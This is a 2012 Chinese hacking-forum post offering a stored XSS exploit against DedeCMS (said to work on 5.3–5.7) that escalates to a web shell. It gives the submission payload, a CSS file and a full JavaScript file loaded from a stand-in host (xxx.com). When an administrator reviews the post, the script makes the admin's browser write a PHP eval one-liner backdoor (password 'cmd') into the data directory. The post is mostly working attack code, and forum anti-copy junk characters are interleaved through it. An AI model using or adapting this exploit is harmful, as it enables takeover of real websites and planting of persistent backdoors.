找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1752|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
7 J' l0 [& k1 G8 p为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)) B2 h* S4 F/ Y, N8 w! V; \% \
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
' {1 B! X0 s5 ^. q) r下面说说利用方法。
& \! B4 u) d( ]' A条件有2个:
1 u  M" t' |( g/ ^1.开启注册
4 T8 F, m9 b/ B8 i2.开启投稿
, {; g6 [: T' z0 @# ^注册会员----发表文章' Y+ g2 X( j% H4 j5 l* j" E9 W; N
内容填写:
; j) a) @6 ]! M7 ~6 R复制代码1 d3 }: e- V  O) L! X
<style>@im\port'\http://xxx.com/xss.css';</style>/ y7 b# u$ k9 i6 _& {) U
新建XSS.Css9 d- B/ b( g; `0 d: o
复制代码% c0 p5 k% r( `, S" S2 v& D: Q
.body{
9 v+ p! O9 j8 q8 I! r& B( gbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }. o+ J0 j% y& u1 K' {/ L
新建xss.js 内容为  V/ x' ~& @" J$ m4 N* J
复制代码. f2 f) q& o2 |  m
1.var request = false;! V' @8 L# m. v
2.if(window.XMLHttpRequest) {
1 z9 o: V- w% q' r: e& z0 v3.request = new XMLHttpRequest();2 r  ]. C  F+ _9 @1 ]# ?
4.if(request.overrideMimeType) {
& Q# V5 O5 U! `5 r: e8 G+ w5.request.overrideMimeType('text/xml');
! K# h2 U" `' {0 K7 I5 m6.}
3 X7 O$ S4 S4 F0 S7.} else if(window.ActiveXObject) {
- o) U$ C- V' Q' l, I8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];" `  B1 Q- n& P1 z" t' u, g$ P
9.for(var i=0; i<versions.length; i++) {
; u6 b( y; T6 e; G8 s/ L* F3 ~10.try {
( k% N. f* J+ ]0 q% L+ ]11.request = new ActiveXObject(versions);. W9 i! y# d" _2 t' a5 q# M
12.} catch(e) {}. N% w2 R6 o: [" A9 S
13.}. f' D+ ]8 m' V, o
14.}
6 i+ l# c. k* y15.xmlhttp=request;
8 h0 Y# f$ C5 f3 f9 C+ v- G$ S16.function getFolder( url ){
* I* Q3 i5 c. C8 y( V& u17. obj = url.split('/')
9 [0 R1 Z/ ?' ^; ^3 n2 {& N5 K* f18. return obj[obj.length-2]
+ o( o* A, C5 `% R  r: ^: @  ~19.}. N; B+ }7 N6 j4 I& g
20.oUrl = top.location.href;
4 X4 a! h+ X# f- _: e- I% j21.u = getFolder(oUrl);
3 v$ c; ]/ ?4 u* B* A, o' b" t22.add_admin();
0 X$ K6 T- N, p2 B# a  f7 n$ T23.function add_admin(){
; s8 W' p# E" S$ b% f) @9 F- r24.var url= "/"+u+"/sys_sql_query.php";
# b. f: t2 v& Q6 v25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";: U6 Q* T9 g+ T9 c' X
26.xmlhttp.open("POST", url, true);
) n" ?+ R+ N: Q& @, F' _4 K  }27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");7 E* `- s0 f6 ]
28.xmlhttp.setRequestHeader("Content-length", params.length);
4 w" p6 R. L6 L% w29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");$ \2 o7 M" b6 ~- }( D- z
30.xmlhttp.send(params);' V6 ]0 s& v' W  G( u
31.}
* y& d. N2 [& X9 X当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表